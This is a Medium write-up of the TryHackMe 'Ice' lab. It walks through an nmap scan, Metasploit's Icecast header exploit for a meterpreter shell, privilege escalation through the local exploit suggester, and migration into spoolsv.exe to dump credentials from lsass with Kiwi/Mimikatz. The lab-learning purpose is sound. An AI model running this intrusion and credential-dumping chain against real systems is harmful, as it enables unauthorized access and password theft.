Open in app

Sign in

Write

Sign in

TryHackMe: ICE BoxWriteup

Abdullah Hamza
8 min readFeb 12, 2024

--

Deploy & hack into a Windows machine, exploiting a very poorly secured media server. Click on the following link and join the room.

TryHackMe | Ice

Deploy & hack into a Windows machine, exploiting a very poorly secured media server.

tryhackme.com

Check connection

Ping machine IP to check if the connection is established. In my case ping is successful so the connection is established.

Checking Connection

Scanning

Let’s start with a nmap scan. Use following command to scan the target IP address.

sudo nmap -sS -Pn -A -p- -oN scan.txt -T4 10.10.49.124

This command performs a comprehensive scan of the specified IP address, attempting to gather detailed information about the services, ports, and operating system running on the target machine.

  • sudo Allows executing the subsequent command with superuser privileges, often necessary for network scanning as it requires low-level access to network functions.
  • nmap Invokes the Nmap application, used for network exploration and security auditing.
  • -sS Specifies the SYN scan technique. SYN scanning involves sending SYN packets to the target ports to determine whether they are open, closed, or filtered. It's one of the stealthiest and faster scanning methods.
  • -Pn Treats all hosts as online and does not perform a host discovery phase. This flag is useful when the target's state is uncertain or if it's known that the target doesn't respond to ping requests.
  • -A Activates aggressive scanning options. This includes OS detection, version detection, script scanning, and traceroute.
  • -p- Scans all 65,535 TCP ports on the target. This is an exhaustive scan to discover all available services.
  • -oN scan.txt Directs the output of the scan to a file named scan.txt. The -oN flag specifies normal output format, which can be easily read by humans.
  • -T4 Sets the timing template to T4, which determines how fast the scan should be performed. T4 is a reasonably fast timing template, balancing speed with reliability.
Nmap scan results

Based of these results, Let’s answer the questions of Recon part on tryhackme.

Recon questions and answers

Gain Access

We have seen interesting services running on different ports. One of the most interesting service is Icecast running on port 8000. Let’s search if the exploit for this service exists. To search for exploits related to Icecast using SearchSploit, you can run the following command

searchspoit icecast

This will display a list of available exploits and related information. Make sure you have SearchSploit installed on your system.

available exploits on searchsploit

Search exploit on database

To find CVE number of exploit on CVE Database click on the following link and search for ICECAST.

CVE security vulnerability database. Security vulnerabilities, exploits, references and more

CVEdetails.com is a free CVE security vulnerability database/information source. You can view CVE vulnerability…

www.cvedetails.com

We found the CVE number of exploit with rating of 7.5

CVE number of exploit on database

To check the category of exploit click on the CVE number and you will see the category of exploit.

Vulnerability Category

Metasploit

To load Metasploit type following command in terminal

msfconsole

and once console is loaded use following command to search for exploit

search icecast
searching for exploit on msfconsole

We have found an exploit for icecast. Let’s use it to exploit the vulnerability in icecase. For that, copy the name of exploit and type following command in console to use it.

use exploit/windows/http/icecast_header

and then use the following command to see options for exploit

show options
using exploit for icecast

To set the target system for exploitation use the following command with the target system IP address.

set RHOSTS 10.10.49.124

To set Local Host (LHOST) parameter use the actual IP address of the system where you want to receive connections or responses.

set LHOST 10.6.114.60
Setting RHOSTS and LHOST

Type command run in console to get the meterpreter shell and use ls command to verify if the exploit ran successfully.

using ls command to list files in meterpreter session

and we got that working….congratulations🎉🎉🎉

Based on the findings answer the questions on tryhackme.

Gain Access answers on tryhackme

Get system information

Let’s use getuid command to see the server username and sysinfo command to get the system information.

Getting system information

Shell access

To open shell of the compromised system we can type shell command in the meterpreter. We can verify the shell by using command whoami in the shell as it gives the same information about the system as the getuid command in meterpreter.

shell of the compromised system

We can use background command in meterpreter session to send it to background.

Session running in background

Now, we are using search suggestercommand to search exploit suggester for this vulnerability and we found an exploit suggester for that.

Exploit found on metasploit to exploit vulnerability

Use following command to select that exploit suggester.

use post/multi/recon/local_exploit_suggester
using the exploit we found

In Metasploit, the show options command is used to display the available options and their current settings for a selected module.

After running the show options command, Metasploit will display a list of options for the selected module, along with their current values or default settings. In this case it is using SESSION and default value is set to YES.

Use sessions command in meterpreter to check which sessions are available. We can see that meterpreter session is available for us at Id 2.

Checking sessions available for this

Now, let’s use set session 2 command to set that payload runs at session 2 of windows.

Setting session 2 for exploit

The session is set to 2. Now, let’s use run command to execute the exploit suggester.

exploit suggester executed

On executing exploit suggester we found an exploit for windows. Let’s use that exploit by typing use command with the name of the exploit and check options by using show options command.

using exploit to access windows system

By using info command we can see the description of the exploit.

Description of the exploit used

Now that we have selected the exploit. Let’s set up the listener by using set lhostcommand and session 2 by using set session 2 command and finally we can execute the payload by using run command.

Executing payload

After execution of payload we need to wait for next 10 seconds to get a meterpreter session. Let’s run dir command to check if we have the right session. The dir command is useful in various contexts, from basic file browsing to more complex file management tasks. It is part of the suite of basic commands available in the Windows command prompt and is analogous to the ls command in Unix-based systems.

Listing files in windows

Now that, we have successfully established meterpreter session Let’s send this to background and check with sessionscommand to see if we have the session running in background.

Sessions established in background

We can see our 2 sessions running in background. Let’s select session 3 with sessions command. To check which privileges we have got here we can use getprivscommand in meterpreter and it lists out the privileges we got.

checking privileges on the target machine

On checking the privileges, We can see that we can exploit SeTakeOwnershipPrivilege permission to take ownership of files. Based on the information we have Let’s answer the questions on tryhackme.

Escalate answers on tryhackme
Escalate answers on tryhackme

Looting

Now, Moving on to the looting part, we need to move to a process that actually has the permissions that we need to interact with the lsass service, the service responsible for authentication within Windows. First, let’s list the processes using the command `ps`.

In order to interact with lsass we need to be ‘living in’ a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. The printer spool service happens to meet our needs perfectly for this

lsass service found along with spoolsv

We can migrate into the service by using command migrate 1260 . It should provide us with X64 machine session. Let’s check system information with sysinfo command and whooop we got that!!

migrated to spoolsv.exe process

Now, Let’s use getuid command to check with which user we are logged in.

Checking username

So, we are logged in as NT AUTHORITY\SYSTEM.

Now that we’ve made our way to full administrator permissions we’ll set our sights on looting. Mimikatz is a rather infamous password dumping tool that is incredibly useful. Let’s load it now using the command `load kiwi` load kiwi (Kiwi is the updated version of Mimikatz)

Loading Kiwi

Now, to retrieve all credentials we can use creds_all command.

Retrieving credentials

Whooooop!! We got the credentials. We have the password of Dark-PC as well. Based on these findings let’s answer questions of looting part on tryhackme.

looting part answers on tryhackme

The post exploitation part of ice box is an easy task. Just read the description provided on tryhackme and you are good to go.
CONGRATULATIONS!!! The room is completed!

This walkthrough finishes here. Stay tuned for the next adventure! 🚀😊

Tryhackme Walkthrough
Ctf Writeup
Infosec
Cybersecurity
Ice Tryhackme

--

--

Abdullah Hamza
Abdullah Hamza

Written by Abdullah Hamza

74 Followers
12 Following

Developer | CEH | Penetration Tester | Red Team

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams